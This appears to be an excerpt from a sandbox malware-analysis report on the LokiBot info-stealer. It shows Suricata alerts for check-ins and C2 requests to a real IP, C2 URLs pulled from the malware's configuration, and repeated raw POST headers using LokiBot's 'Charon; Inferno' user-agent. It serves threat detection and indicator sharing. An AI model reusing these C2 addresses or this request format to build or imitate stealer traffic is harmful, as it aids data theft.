              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50093 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50093 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50093 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49939 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49939 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49939 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49939 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49939 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50085 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50085 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50085 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49899 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49899 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49899 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50085 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49899 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49899 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50085 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49986 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49986 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49986 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49986 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49986 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50102 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50102 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50102 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50065 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50065 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50065 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50076 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50102 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50076 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50076 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50065 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50065 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50076 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50076 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50102 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50090 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50090 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50090 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50090 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50069 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50069 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50069 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50069 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50069 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50090 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50070 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50070 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50070 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50070 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50070 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50084 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50084 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50084 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50091 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50091 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50091 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50084 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50084 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50091 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50091 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50080 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50080 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50080 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50083 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50083 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50083 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50083 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50083 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50075 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50075 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50075 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50075 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50075 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50095 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50095 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50095 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50108 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50088 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50088 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50095 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50095 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50108 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50108 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50108 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50108 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50088 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50088 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50088 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50071 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50071 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50071 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50071 -> 94.156.177.41:80
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
